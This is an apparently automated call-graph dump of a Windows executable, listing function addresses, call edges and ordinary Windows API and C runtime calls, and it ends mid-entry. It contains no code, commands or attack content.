99494 b1ce75 Mailbox 99471->99494 99507 b1dab9 99471->99507 99473 b1d0cd 99474 b1d242 99473->99474 99478 b1d0db 99473->99478 99557 b1dbdc 92 API calls Mailbox 99474->99557 99477 b1d251 99477->99478 99479 b1d25d 99477->99479 99520 b1cc82 99478->99520 99479->99494 99480 aa9997 84 API calls 99497 b1cec6 Mailbox 99480->99497 99485 b1d114 99535 ac0e48 99485->99535 99488 b1d147 99542 aa942e 99488->99542 99489 b1d12e 99541 b0a0b5 89 API calls 4 library calls 99489->99541 99492 b1d139 GetCurrentProcess TerminateProcess 99492->99488 99494->99196 99497->99473 99497->99480 99497->99494 99539 b0f835 59 API calls 2 library calls 99497->99539 99540 b1d2f3 61 API calls 2 library calls 99497->99540 99499 b1d2b8 99499->99494 99502 b1d2cc FreeLibrary 99499->99502 99500 b1d17f 99554 b1d95d 107 API calls _free 99500->99554 99502->99494 99504 b1d190 99504->99499 99555 aa8ea0 59 API calls Mailbox 99504->99555 99556 aa9e9c 60 API calls Mailbox 99504->99556 99558 b1d95d 107 API calls _free 99504->99558 99508 aa7faf 59 API calls 99507->99508 99509 b1dad4 CharLowerBuffW 99508->99509 99559 aff658 99509->99559 99513 aa77c7 59 API calls 99514 b1db0d 99513->99514 99515 aa79ab 59 API calls 99514->99515 99516 b1db24 99515->99516 99517 aa7e8c 59 API calls 99516->99517 99518 b1db30 Mailbox 99517->99518 99519 b1db6c Mailbox 99518->99519 99566 b1d2f3 61 API calls 2 library calls 99518->99566 99519->99497 99521 b1cc9d 99520->99521 99525 b1ccf2 99520->99525 99522 ac0ff6 Mailbox 59 API calls 99521->99522 99523 b1ccbf 99522->99523 99524 ac0ff6 Mailbox 59 API calls 99523->99524 99523->99525 99524->99523 99526 b1dd64 99525->99526 99527 b1df8d Mailbox 99526->99527 99533 b1dd87 _strcat _wcscpy __NMSG_WRITE 99526->99533 99527->99485 99528 aa9d46 59 API calls 99528->99533 99529 aa9c9c 59 API calls 99529->99533 99530 aa9cf8 59 API calls 99530->99533 99531 aa9997 84 API calls 99531->99533 99532 ac594c 58 API calls std::exception::_Copy_str 99532->99533 99533->99527 99533->99528 99533->99529 99533->99530 99533->99531 99533->99532 99569 b05b29 61 API calls 2 library calls 99533->99569 99537 ac0e5d 99535->99537 99536 ac0ef5 VirtualAlloc 99538 ac0ec3 99536->99538 99537->99536 99537->99538 99538->99488 99538->99489 99539->99497 99540->99497 99541->99492 99543 aa9436 99542->99543 99544 ac0ff6 Mailbox 59 API calls 99543->99544 99545 aa9444 99544->99545 99546 aa9450 99545->99546 99570 aa935c 59 API calls Mailbox 99545->99570 99548 aa91b0 99546->99548 99571 aa92c0 99548->99571 99550 ac0ff6 Mailbox 59 API calls 99552 aa925b 99550->99552 99551 aa91bf 99551->99550 99551->99552 99552->99504 99553 aa8ea0 59 API calls Mailbox 99552->99553 99553->99500 99554->99504 99555->99504 99556->99504 99557->99477 99558->99504 99560 aff683 __NMSG_WRITE 99559->99560 99562 aff6b8 99560->99562 99564 aff769 99560->99564 99565 aff6c2 99560->99565 99562->99565 99567 aa7a24 61 API calls 99562->99567 99564->99565 99568 aa7a24 61 API calls 99564->99568 99565->99513 99565->99518 99566->99519 99567->99562 99568->99564 99569->99533 99570->99546 99572 aa92c9 Mailbox 99571->99572 99573 adf5c8 99572->99573 99578 aa92d3 99572->99578 99575 ac0ff6 Mailbox 59 API calls 99573->99575 99574 aa92da 99574->99551 99576 adf5d4 99575->99576 99578->99574 99579 aa9df0 59 API calls Mailbox 99578->99579 99579->99578 99581 af665e 99580->99581 99582 af6641 99580->99582 99581->99202 99582->99581 99584 af6621 59 API calls Mailbox 99582->99584 99584->99582 99585 aa3633 99586 aa366a 99585->99586 99587 aa3688 99586->99587 99588 aa36e7 99586->99588 99629 aa36e5 99586->99629 99592 aa375d PostQuitMessage 99587->99592 99593 aa3695 99587->99593 99590 add31c 99588->99590 99591 aa36ed 99588->99591 99589 aa36ca DefWindowProcW 99594 aa36d8 99589->99594 99635 ab11d0 10 API calls Mailbox 99590->99635 99595 aa36f2 99591->99595 99596 aa3715 SetTimer RegisterWindowMessageW 99591->99596 99592->99594 99597 add38f 99593->99597 99598 aa36a0 99593->99598 99600 add2bf 99595->99600 99601 aa36f9 KillTimer 99595->99601 99596->99594 99602 aa373e CreatePopupMenu 99596->99602 99650 b02a16 71 API calls _memset 99597->99650 99603 aa36a8 99598->99603 99604 aa3767 99598->99604 99609 add2f8 MoveWindow 99600->99609 99610 add2c4 99600->99610 99630 aa44cb Shell_NotifyIconW _memset 99601->99630 99602->99594 99612 add374 99603->99612 99613 aa36b3 99603->99613 99633 aa4531 64 API calls _memset 99604->99633 99606 add343 99636 ab11f3 341 API calls Mailbox 99606->99636 99609->99594 99617 add2c8 99610->99617 99618 add2e7 SetFocus 99610->99618 99612->99589 99649 af817e 59 API calls Mailbox 99612->99649 99615 aa36be 99613->99615 99620 aa374b 99613->99620 99614 add3a1 99614->99589 99614->99594 99615->99589 99637 aa44cb Shell_NotifyIconW _memset 99615->99637 99616 aa375b 99616->99594 99617->99615 99621 add2d1 99617->99621 99618->99594 99619 aa370c 99631 aa3114 DeleteObject DestroyWindow Mailbox 99619->99631 99632 aa45df 81 API calls _memset 99620->99632 99634 ab11d0 10 API calls Mailbox 99621->99634 99627 add368 99638 aa43db 99627->99638 99629->99589 99630->99619 99631->99594 99632->99616 99633->99616 99634->99594 99635->99606 99636->99615 99637->99627 99639 aa4406 _memset 99638->99639 99651 aa4213 99639->99651 99642 aa448b 99644 aa44c1 Shell_NotifyIconW 99642->99644 99645 aa44a5 Shell_NotifyIconW 99642->99645 99646 aa44b3 99644->99646 99645->99646 99655 aa410d 99646->99655 99648 aa44ba 99648->99629 99649->99629 99650->99614 99652 add638 99651->99652 99653 aa4227 99651->99653 99652->99653 99654 add641 DestroyIcon 99652->99654 99653->99642 99677 b03226 62 API calls _W_store_winword 99653->99677 99654->99653 99656 aa4129 99655->99656 99657 aa4200 Mailbox 99655->99657 99658 aa7b76 59 API calls 99656->99658 99657->99648 99659 aa4137 99658->99659 99660 add5dd LoadStringW 99659->99660 99661 aa4144 99659->99661 99663 add5f7 99660->99663 99662 aa7d2c 59 API calls 99661->99662 99664 aa4159 99662->99664 99666 aa7c8e 59 API calls 99663->99666 99664->99663 99665 aa416a 99664->99665 99667 aa4174 99665->99667 99668 aa4205 99665->99668 99671 add601 99666->99671 99669 aa7c8e 59 API calls 99667->99669 99670 aa81a7 59 API calls 99668->99670 99673 aa417e _memset _wcscpy 99669->99673 99670->99673 99672 aa7e0b 59 API calls 99671->99672 99671->99673 99674 add623 99672->99674 99675 aa41e6 Shell_NotifyIconW 99673->99675 99676 aa7e0b 59 API calls 99674->99676 99675->99657 99676->99673 99677->99642 99678 adff06 99679 adff10 99678->99679 99684 aaac90 Mailbox _memmove 99678->99684 99818 aa8e34 59 API calls Mailbox 99679->99818 99682 aab685 99823 b0a0b5 89 API calls 4 library calls 99682->99823 99684->99682 99685 aaa097 Mailbox 99684->99685 99692 aaa1b7 99684->99692 99700 aa7f41 59 API calls 99684->99700 99710 af66f4 Mailbox 59 API calls 99684->99710 99711 aab416 99684->99711 99712 aaa000 341 API calls 99684->99712 99714 ae0c94 99684->99714 99716 ae0ca2 99684->99716 99719 aab37c 99684->99719 99720 ac0ff6 59 API calls Mailbox 99684->99720 99727 aaade2 Mailbox 99684->99727 99734 b1c5f4 99684->99734 99766 b07be0 99684->99766 99772 b1bf80 99684->99772 99819 af7405 59 API calls 99684->99819 99820 b1c4a7 85 API calls 2 library calls 99684->99820 99687 ac0ff6 59 API calls Mailbox 99685->99687 99689 aab5da 99685->99689 99691 aab5d5 99685->99691 99685->99692 99695 ae047f 99685->99695 99697 aa77c7 59 API calls 99685->99697 99699 aa81a7 59 API calls 99685->99699 99702 af7405 59 API calls 99685->99702 99704 ac2f80 67 API calls __cinit 99685->99704 99706 ae0e00 99685->99706 99709 aaa6ba 99685->99709 99812 aaca20 341 API calls 2 library calls 99685->99812 99813 aaba60 60 API calls Mailbox 99685->99813 99687->99685 99828 b0a0b5 89 API calls 4 library calls 99689->99828 99694 aa81a7 59 API calls 99691->99694 99694->99692 99822 b0a0b5 89 API calls 4 library calls 99695->99822 99697->99685 99699->99685 99700->99684 99701 ae048e 99702->99685 99704->99685 99705 af66f4 Mailbox 59 API calls 99705->99692 99827 b0a0b5 89 API calls 4 library calls 99706->99827 99826 b0a0b5 89 API calls 4 library calls 99709->99826 99710->99684 99817 aaf803 341 API calls 99711->99817 99712->99684 99824 aa9df0 59 API calls Mailbox 99714->99824 99825 b0a0b5 89 API calls 4 library calls 99716->99825 99718 ae0c86 99718->99692 99718->99705 99815 aa9e9c 60 API calls Mailbox 99719->99815 99720->99684 99722 aab38d 99816 aa9e9c 60 API calls Mailbox 99722->99816 99727->99682 99727->99692 99727->99718 99728 ae00e0 VariantClear 99727->99728 99729 b0d2e5 101 API calls 99727->99729 99730 b0d2e6 101 API calls 99727->99730 99731 b1e237 130 API calls 99727->99731 99732 ab2123 95 API calls 99727->99732 99733 b1474d 341 API calls 99727->99733 99814 aa9df0 59 API calls Mailbox 99727->99814 99821 af7405 59 API calls 99727->99821 99728->99727 99729->99727 99730->99727 99731->99727 99732->99727 99733->99727 99735 aa77c7 59 API calls 99734->99735 99736 b1c608 99735->99736 99737 aa77c7 59 API calls 99736->99737 99738 b1c610 99737->99738 99739 aa77c7 59 API calls 99738->99739 99740 b1c618 99739->99740 99741 aa9997 84 API calls 99740->99741 99743 b1c626 99741->99743 99742 b1c83c Mailbox 99742->99684 99743->99742 99744 aa7d2c 59 API calls 99743->99744 99745 b1c80f 99743->99745 99747 b1c7f6 99743->99747 99749 aa7a84 59 API calls 99743->99749 99750 b1c811 99743->99750 99753 aa81a7 59 API calls 99743->99753 99756 aa7faf 59 API calls 99743->99756 99759 aa7faf 59 API calls 99743->99759 99763 aa9997 84 API calls 99743->99763 99764 aa7c8e 59 API calls 99743->99764 99765 aa7e0b 59 API calls 99743->99765 99744->99743 99745->99742 99831 aa9b9c 59 API calls Mailbox 99745->99831 99748 aa7e0b 59 API calls 99747->99748 99751 b1c803 99748->99751 99749->99743 99752 aa7e0b 59 API calls 99750->99752 99754 aa7c8e 59 API calls 99751->99754 99755 b1c820 99752->99755 99753->99743 99754->99745 99758 aa7c8e 59 API calls 99755->99758 99757 b1c6bd CharUpperBuffW 99756->99757 99829 aa859a 68 API calls 99757->99829 99758->99745 99761 b1c77d CharUpperBuffW 99759->99761 99830 aac707 69 API calls 2 library calls 99761->99830 99763->99743 99764->99743 99765->99743 99767 b07bec 99766->99767 99768 ac0ff6 Mailbox 59 API calls 99767->99768 99769 b07bfa 99768->99769 99770 b07c08 99769->99770 99771 aa77c7 59 API calls 99769->99771 99770->99684 99771->99770 99773 b1bfc5 99772->99773 99774 b1bfab 99772->99774 99833 b1a528 59 API calls Mailbox 99773->99833 99832 b0a0b5 89 API calls 4 library calls 99774->99832 99777 b1bfd0 99778 aaa000 340 API calls 99777->99778 99779 b1c031 99778->99779 99780 b1c0c3 99779->99780 99784 b1c072 99779->99784 99805 b1bfbd Mailbox 99779->99805 99781 b1c119 99780->99781 99782 b1c0c9 99780->99782 99783 aa9997 84 API calls 99781->99783 99781->99805 99854 b07ba4 59 API calls 99782->99854 99785 b1c12b 99783->99785 99834 b07581 59 API calls Mailbox 99784->99834 99788 aa7faf 59 API calls 99785->99788 99791 b1c14f CharUpperBuffW 99788->99791 99789 b1c0ec 99855 aa5ea1 59 API calls Mailbox 99789->99855 99790 b1c0a2 99835 aaf5c0 99790->99835 99795 b1c169 99791->99795 99794 b1c0f4 Mailbox 99856 aafe40 341 API calls 2 library calls 99794->99856 99796 b1c170 99795->99796 99797 b1c1bc 99795->99797 99857 b07581 59 API calls Mailbox 99796->99857 99799 aa9997 84 API calls 99797->99799 99800 b1c1c4 99799->99800 99858 aa9fbd 60 API calls 99800->99858 99803 b1c19e 99804 aaf5c0 340 API calls 99803->99804 99804->99805 99805->99684 99806 b1c1ce 99806->99805 99807 aa9997 84 API calls 99806->99807 99808 b1c1e9 99807->99808 99859 aa5ea1 59 API calls Mailbox 99808->99859 99810 b1c1f9 99860 aafe40 341 API calls 2 library calls 99810->99860 99812->99685 99813->99685 99814->99727 99815->99722 99816->99711 99817->99682 99818->99684 99819->99684 99820->99684 99821->99727 99822->99701 99823->99718 99824->99718 99825->99718 99826->99692 99827->99689 99828->99692 99829->99743 99830->99743 99831->99742 99832->99805 99833->99777 99834->99790 99836 aaf61a 99835->99836 99837 aaf7b0 99835->99837 99839 ae4848 99836->99839 99840 aaf626 99836->99840 99838 aa7f41 59 API calls 99837->99838 99846 aaf6ec Mailbox 99838->99846 99841 b1bf80 341 API calls 99839->99841 99950 aaf3f0 341 API calls 2 library calls 99840->99950 99843 ae4856 99841->99843 99847 aaf790 99843->99847 99952 b0a0b5 89 API calls 4 library calls 99843->99952 99845 aaf65d 99845->99843 99845->99846 99845->99847 99849 aaf743 99846->99849 99851 b03e73 3 API calls 99846->99851 99861 b0cde5 99846->99861 99941 aa4faa 99846->99941 99947 b1e24b 99846->99947 99847->99805 99849->99847 99951 aa9df0 59 API calls Mailbox 99849->99951 99851->99849 99854->99789 99855->99794 99856->99805 99857->99803 99858->99806 99859->99810 99860->99805 99862 aa77c7 59 API calls 99861->99862 99863 b0ce1a 99862->99863 99864 aa77c7 59 API calls 99863->99864 99865 b0ce23 99864->99865 99866 b0ce37 99865->99866 99867 aa9c9c 59 API calls 99865->99867 99868 aa9997 84 API calls 99866->99868 99867->99866 99869 b0ce54 99868->99869 99870 b0cf55 99869->99870 99871 b0ce76 99869->99871 99940 b0cf85 Mailbox 99869->99940 99953 aa4f3d 99870->99953 99872 aa9997 84 API calls 99871->99872 99874 b0ce82 99872->99874 99876 aa81a7 59 API calls 99874->99876 99879 b0ce8e 99876->99879 99877 b0cf81 99878 aa77c7 59 API calls 99877->99878 99877->99940 99881 b0cfb6 99878->99881 99884 b0cea2 99879->99884 99885 b0ced4 99879->99885 99880 aa4f3d 136 API calls 99880->99877 99882 aa77c7 59 API calls 99881->99882 99883 b0cfbf 99882->99883 99887 aa77c7 59 API calls 99883->99887 99888 aa81a7 59 API calls 99884->99888 99886 aa9997 84 API calls 99885->99886 99889 b0cee1 99886->99889 99890 b0cfc8 99887->99890 99891 b0ceb2 99888->99891 99892 aa81a7 59 API calls 99889->99892 99893 aa77c7 59 API calls 99890->99893 99894 aa7e0b 59 API calls 99891->99894 99895 b0ceed 99892->99895 99896 b0cfd1 99893->99896 99897 b0cebc 99894->99897 100086 b04cd3 GetFileAttributesW 99895->100086 99899 aa9997 84 API calls 99896->99899 99900 aa9997 84 API calls 99897->99900 99903 b0cfde 99899->99903 99901 b0cec8 99900->99901 99904 aa7c8e 59 API calls 99901->99904 99902 b0cef6 99905 b0cf09 99902->99905 99908 aa7b52 59 API calls 99902->99908 99906 aa46f9 59 API calls 99903->99906 99904->99885 99907 aa9997 84 API calls 99905->99907 99914 b0cf0f 99905->99914 99909 b0cff9 99906->99909 99910 b0cf36 99907->99910 99908->99905 99911 aa7b52 59 API calls 99909->99911 100087 b03a2b 75 API calls Mailbox 99910->100087 99913 b0d008 99911->99913 99915 b0d03c 99913->99915 99916 aa7b52 59 API calls 99913->99916 99914->99940 99917 aa81a7 59 API calls 99915->99917 99918 b0d019 99916->99918 99919 b0d04a 99917->99919 99918->99915 99921 aa7d2c 59 API calls 99918->99921 99920 aa7c8e 59 API calls 99919->99920 99922 b0d058 99920->99922 99923 b0d02e 99921->99923 99924 aa7c8e 59 API calls 99922->99924 99925 aa7d2c 59 API calls 99923->99925 99926 b0d066 99924->99926 99925->99915 99927 aa7c8e 59 API calls 99926->99927 99928 b0d074 99927->99928 99929 aa9997 84 API calls 99928->99929 99930 b0d080 99929->99930 99977 b042ad 99930->99977 99932 b0d091 99933 b03e73 3 API calls 99932->99933 99934 b0d09b 99933->99934 99935 aa9997 84 API calls 99934->99935 99939 b0d0cc 99934->99939 99936 b0d0b9 99935->99936 100031 b093df 99936->100031 99938 aa4faa 84 API calls 99938->99940 99939->99938 99940->99849 99942 aa4fb4 99941->99942 99944 aa4fbb 99941->99944 99943 ac55d6 __fcloseall 83 API calls 99942->99943 99943->99944 99945 aa4fca 99944->99945 99946 aa4fdb FreeLibrary 99944->99946 99945->99849 99946->99945 99948 b1cdf1 130 API calls 99947->99948 99949 b1e25b 99948->99949 99949->99849 99950->99845 99951->99849 99952->99847 100088 aa4d13 99953->100088 99958 addd0f 99961 aa4faa 84 API calls 99958->99961 99959 aa4f68 LoadLibraryExW 100098 aa4cc8 99959->100098 99963 addd16 99961->99963 99965 aa4cc8 3 API calls 99963->99965 99967 addd1e 99965->99967 99966 aa4f8f 99966->99967 99968 aa4f9b 99966->99968 100124 aa506b 99967->100124 99969 aa4faa 84 API calls 99968->99969 99971 aa4fa0 99969->99971 99971->99877 99971->99880 99974 addd45 100132 aa5027 99974->100132 99978 b042c9 99977->99978 99979 b042dc 99978->99979 99980 b042ce 99978->99980 99982 aa77c7 59 API calls 99979->99982 99981 aa81a7 59 API calls 99980->99981 99983 b042d7 Mailbox 99981->99983 99984 b042e4 99982->99984 99983->99932 99985 aa77c7 59 API calls 99984->99985 99986 b042ec 99985->99986 99987 aa77c7 59 API calls 99986->99987 99988 b042f7 99987->99988 99989 aa77c7 59 API calls 99988->99989 99990 b042ff 99989->99990 99991 aa77c7 59 API calls 99990->99991 99992 b04307 99991->99992 99993 aa77c7 59 API calls 99992->99993 99994 b0430f 99993->99994 99995 aa77c7 59 API calls 99994->99995 99996 b04317 99995->99996 99997 aa77c7 59 API calls 99996->99997 99998 b0431f 99997->99998 99999 aa46f9 59 API calls 99998->99999 100000 b04336 99999->100000 100001 aa46f9 59 API calls 100000->100001 100002 b0434f 100001->100002 100003 aa7b52 59 API calls 100002->100003 100004 b0435b 100003->100004 100005 b0436e 100004->100005 100007 aa7e8c 59 API calls 100004->100007 100006 aa7b52 59 API calls 100005->100006 100008 b04377 100006->100008 100007->100005 100009 b04387 100008->100009 100010 aa7e8c 59 API calls 100008->100010 100011 aa81a7 59 API calls 100009->100011 100010->100009 100012 b04393 100011->100012 100013 aa7c8e 59 API calls 100012->100013 100014 b0439f 100013->100014 100559 b0445f 59 API calls 100014->100559 100016 b043ae 100560 b0445f 59 API calls 100016->100560 100018 b043c1 100019 aa7b52 59 API calls 100018->100019 100020 b043cb 100019->100020 100021 b043d0 100020->100021 100022 b043e2 100020->100022 100023 aa7e0b 59 API calls 100021->100023 100024 aa7b52 59 API calls 100022->100024 100025 b043dd 100023->100025 100026 b043eb 100024->100026 100029 aa7c8e 59 API calls 100025->100029 100027 b04409 100026->100027 100028 aa7e0b 59 API calls 100026->100028 100030 aa7c8e 59 API calls 100027->100030 100028->100025 100029->100027 100030->99983 100032 b093ec __ftell_nolock 100031->100032 100033 ac0ff6 Mailbox 59 API calls 100032->100033 100034 b09449 100033->100034 100035 aa538e 59 API calls 100034->100035 100036 b09453 100035->100036 100037 b091e9 GetSystemTimeAsFileTime 100036->100037 100038 b0945e 100037->100038 100039 aa5045 85 API calls 100038->100039 100040 b09471 _wcscmp 100039->100040 100041 b09542 100040->100041 100042 b09495 100040->100042 100043 b099be 96 API calls 100041->100043 100591 b099be 100042->100591 100059 b0950e _wcscat 100043->100059 100047 aa506b 74 API calls 100049 b09567 100047->100049 100048 b0954b 100048->99939 100050 aa506b 74 API calls 100049->100050 100052 b09577 100050->100052 100051 b094c3 _wcscat _wcscpy 100598 ac432e 58 API calls __wsplitpath_helper 100051->100598 100053 aa506b 74 API calls 100052->100053 100055 b09592 100053->100055 100056 aa506b 74 API calls 100055->100056 100057 b095a2 100056->100057 100058 aa506b 74 API calls 100057->100058 100060 b095bd 100058->100060 100059->100047 100059->100048 100061 aa506b 74 API calls 100060->100061 100062 b095cd 100061->100062 100063 aa506b 74 API calls 100062->100063 100064 b095dd 100063->100064 100065 aa506b 74 API calls 100064->100065 100066 b095ed 100065->100066 100561 b09b6d GetTempPathW GetTempFileNameW 100066->100561 100068 b095f9 100069 ac548b 115 API calls 100068->100069 100079 b0960a 100069->100079 100070 b096c4 100575 ac55d6 100070->100575 100073 aa506b 74 API calls 100073->100079 100079->100048 100079->100070 100079->100073 100562 ac4a93 100079->100562 100086->99902 100087->99914 100137 aa4d61 100088->100137 100091 aa4d61 2 API calls 100094 aa4d3a 100091->100094 100092 aa4d4a FreeLibrary 100093 aa4d53 100092->100093 100095 ac548b 100093->100095 100094->100092 100094->100093 100141 ac54a0 100095->100141 100097 aa4f5c 100097->99958 100097->99959 100299 aa4d94 100098->100299 100101 aa4ced 100103 aa4d08 100101->100103 100104 aa4cff FreeLibrary 100101->100104 100102 aa4d94 2 API calls 100102->100101 100105 aa4dd0 100103->100105 100104->100103 100106 ac0ff6 Mailbox 59 API calls 100105->100106 100107 aa4de5 100106->100107 100108 aa538e 59 API calls 100107->100108 100109 aa4df1 _memmove 100108->100109 100110 aa4e2c 100109->100110 100111 aa4ee9 100109->100111 100112 aa4f21 100109->100112 100113 aa5027 69 API calls 100110->100113 100303 aa4fe9 CreateStreamOnHGlobal 100111->100303 100314 b09ba5 95 API calls 100112->100314 100116 aa4e35 100113->100116 100117 aa506b 74 API calls 100116->100117 100118 aa4ec9 100116->100118 100120 addcd0 100116->100120 100309 aa5045 100116->100309 100117->100116 100118->99966 100121 aa5045 85 API calls 100120->100121 100122 addce4 100121->100122 100123 aa506b 74 API calls 100122->100123 100123->100118 100125 aa507d 100124->100125 100128 adddf6 100124->100128 100338 ac5812 100125->100338 100129 b09393 100536 b091e9 100129->100536 100131 b093a9 100131->99974 100133 adddb9 100132->100133 100134 aa5036 100132->100134 100541 ac5e90 100134->100541 100136 aa503e 100138 aa4d2e 100137->100138 100139 aa4d6a LoadLibraryA 100137->100139 100138->100091 100138->100094 100139->100138 100140 aa4d7b GetProcAddress 100139->100140 100140->100138 100143 ac54ac __wsopen_helper 100141->100143 100142 ac54bf 100190 ac8d68 58 API calls __getptd_noexit 100142->100190 100143->100142 100146 ac54f0 100143->100146 100145 ac54c4 100191 ac8ff6 9 API calls __controlfp_s 100145->100191 100160 ad0738 100146->100160 100149 ac54f5 100150 ac54fe 100149->100150 100151 ac550b 100149->100151 100192 ac8d68 58 API calls __getptd_noexit 100150->100192 100152 ac5535 100151->100152 100153 ac5515 100151->100153 100175 ad0857 100152->100175 100193 ac8d68 58 API calls __getptd_noexit 100153->100193 100157 ac54cf __wsopen_helper @_EH4_CallFilterFunc@8 100157->100097 100161 ad0744 __wsopen_helper 100160->100161 100162 ac9e4b __lock 58 API calls 100161->100162 100173 ad0752 100162->100173 100163 ad07c6 100195 ad084e 100163->100195 100164 ad07cd 100200 ac8a5d 58 API calls 2 library calls 100164->100200 100167 ad07d4 100167->100163 100201 aca06b InitializeCriticalSectionAndSpinCount 100167->100201 100168 ad0843 __wsopen_helper 100168->100149 100170 ac9ed3 __mtinitlocknum 58 API calls 100170->100173 100172 ad07fa EnterCriticalSection 100172->100163 100173->100163 100173->100164 100173->100170 100198 ac6e8d 59 API calls __lock 100173->100198 100199 ac6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100173->100199 100184 ad0877 __wopenfile 100175->100184 100176 ad0891 100206 ac8d68 58 API calls __getptd_noexit 100176->100206 100177 ad0a4c 100177->100176 100181 ad0aaf 100177->100181 100179 ad0896 100207 ac8ff6 9 API calls __controlfp_s 100179->100207 100203 ad87f1 100181->100203 100182 ac5540 100194 ac5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 100182->100194 100184->100176 100184->100177 100208 ac3a0b 60 API calls 2 library calls 100184->100208 100186 ad0a45 100186->100177 100209 ac3a0b 60 API calls 2 library calls 100186->100209 100188 ad0a64 100188->100177 100210 ac3a0b 60 API calls 2 library calls 100188->100210 100190->100145 100191->100157 100192->100157 100193->100157 100194->100157 100202 ac9fb5 LeaveCriticalSection 100195->100202 100197 ad0855 100197->100168 100198->100173 100199->100173 100200->100167 100201->100172 100202->100197 100211 ad7fd5 100203->100211 100205 ad880a 100205->100182 100206->100179 100207->100182 100208->100186 100209->100188 100210->100177 100214 ad7fe1 __wsopen_helper 100211->100214 100212 ad7ff7 100296 ac8d68 58 API calls __getptd_noexit 100212->100296 100214->100212 100216 ad802d 100214->100216 100215 ad7ffc 100297 ac8ff6 9 API calls __controlfp_s 100215->100297 100222 ad809e 100216->100222 100219 ad8049 100298 ad8072 LeaveCriticalSection __unlock_fhandle 100219->100298 100221 ad8006 __wsopen_helper 100221->100205 100223 ad80be 100222->100223 100224 ac471a __wsopen_nolock 58 API calls 100223->100224 100227 ad80da 100224->100227 100225 ac9006 __invoke_watson 8 API calls 100226 ad87f0 100225->100226 100229 ad7fd5 __wsopen_helper 103 API calls 100226->100229 100228 ad8114 100227->100228 100232 ad8137 100227->100232 100245 ad8211 100227->100245 100230 ac8d34 __read_nolock 58 API calls 100228->100230 100231 ad880a 100229->100231 100233 ad8119 100230->100233 100231->100219 100236 ad81f5 100232->100236 100244 ad81d3 100232->100244 100234 ac8d68 __controlfp_s 58 API calls 100233->100234 100235 ad8126 100234->100235 100237 ac8ff6 __controlfp_s 9 API calls 100235->100237 100238 ac8d34 __read_nolock 58 API calls 100236->100238 100239 ad8130 100237->100239 100240 ad81fa 100238->100240 100239->100219 100241 ac8d68 __controlfp_s 58 API calls 100240->100241 100242 ad8207 100241->100242 100243 ac8ff6 __controlfp_s 9 API calls 100242->100243 100243->100245 100246 acd4d4 __alloc_osfhnd 61 API calls 100244->100246 100245->100225 100247 ad82a1 100246->100247 100248 ad82ce 100247->100248 100249 ad82ab 100247->100249 100251 ad7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100248->100251 100250 ac8d34 __read_nolock 58 API calls 100249->100250 100252 ad82b0 100250->100252 100262 ad82f0 100251->100262 100253 ac8d68 __controlfp_s 58 API calls 100252->100253 100255 ad82ba 100253->100255 100254 ad836e GetFileType 100256 ad8379 GetLastError 100254->100256 100257 ad83bb 100254->100257 100260 ac8d68 __controlfp_s 58 API calls 100255->100260 100261 ac8d47 __dosmaperr 58 API calls 100256->100261 100266 acd76a __set_osfhnd 59 API calls 100257->100266 100258 ad833c GetLastError 100259 ac8d47 __dosmaperr 58 API calls 100258->100259 100263 ad8361 100259->100263 100260->100239 100264 ad83a0 CloseHandle 100261->100264 100262->100254 100262->100258 100265 ad7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100262->100265 100269 ac8d68 __controlfp_s 58 API calls 100263->100269 100264->100263 100267 ad83ae 100264->100267 100268 ad8331 100265->100268 100273 ad83d9 100266->100273 100270 ac8d68 __controlfp_s 58 API calls 100267->100270 100268->100254 100268->100258 100269->100245 100271 ad83b3 100270->100271 100271->100263 100272 ad8594 100272->100245 100275 ad8767 CloseHandle 100272->100275 100273->100272 100274 ad1b11 __lseeki64_nolock 60 API calls 100273->100274 100293 ad845a 100273->100293 100276 ad8443 100274->100276 100277 ad7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100275->100277 100279 ac8d34 __read_nolock 58 API calls 100276->100279 100276->100293 100278 ad878e 100277->100278 100280 ad87c2 100278->100280 100281 ad8796 GetLastError 100278->100281 100279->100293 100280->100245 100282 ac8d47 __dosmaperr 58 API calls 100281->100282 100284 ad87a2 100282->100284 100283 ad848c 100287 ad99f2 __chsize_nolock 82 API calls 100283->100287 100283->100293 100288 acd67d __free_osfhnd 59 API calls 100284->100288 100285 ad10ab 70 API calls __read_nolock 100285->100293 100286 ad0d2d __close_nolock 61 API calls 100286->100293 100287->100283 100288->100280 100289 acdac6 __write 78 API calls 100289->100293 100290 ad8611 100292 ad0d2d __close_nolock 61 API calls 100290->100292 100291 ad1b11 60 API calls __lseeki64_nolock 100291->100293 100294 ad8618 100292->100294 100293->100272 100293->100283 100293->100285 100293->100286 100293->100289 100293->100290 100293->100291 100295 ac8d68 __controlfp_s 58 API calls 100294->100295 100295->100245 100296->100215 100297->100221 100298->100221 100300 aa4ce1 100299->100300 100301 aa4d9d LoadLibraryA 100299->100301 100300->100101 100300->100102 100301->100300 100302 aa4dae GetProcAddress 100301->100302 100302->100300 100304 aa5003 FindResourceExW 100303->100304 100308 aa5020 100303->100308 100305 addd5c LoadResource 100304->100305 100304->100308 100306 addd71 SizeofResource 100305->100306 100305->100308 100307 addd85 LockResource 100306->100307 100306->100308 100307->100308 100308->100110 100310 adddd4 100309->100310 100311 aa5054 100309->100311 100315 ac5a7d 100311->100315 100313 aa5062 100313->100116 100314->100110 100316 ac5a89 __wsopen_helper 100315->100316 100317 ac5a9b 100316->100317 100318 ac5ac1 100316->100318 100328 ac8d68 58 API calls __getptd_noexit 100317->100328 100330 ac6e4e 100318->100330 100320 ac5aa0 100329 ac8ff6 9 API calls __controlfp_s 100320->100329 100325 ac5ad6 100337 ac5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 100325->100337 100327 ac5aab __wsopen_helper 100327->100313 100328->100320 100329->100327 100331 ac6e5e 100330->100331 100332 ac6e80 EnterCriticalSection 100330->100332 100331->100332 100333 ac6e66 100331->100333 100334 ac5ac7 100332->100334 100335 ac9e4b __lock 58 API calls 100333->100335 100336 ac59ee 83 API calls 5 library calls 100334->100336 100335->100334 100336->100325 100337->100327 100341 ac582d 100338->100341 100340 aa508e 100340->100129 100342 ac5839 __wsopen_helper 100341->100342 100343 ac587c 100342->100343 100344 ac584f _memset 100342->100344 100345 ac5874 __wsopen_helper 100342->100345 100346 ac6e4e __lock_file 59 API calls 100343->100346 100368 ac8d68 58 API calls __getptd_noexit 100344->100368 100345->100340 100347 ac5882 100346->100347 100354 ac564d 100347->100354 100350 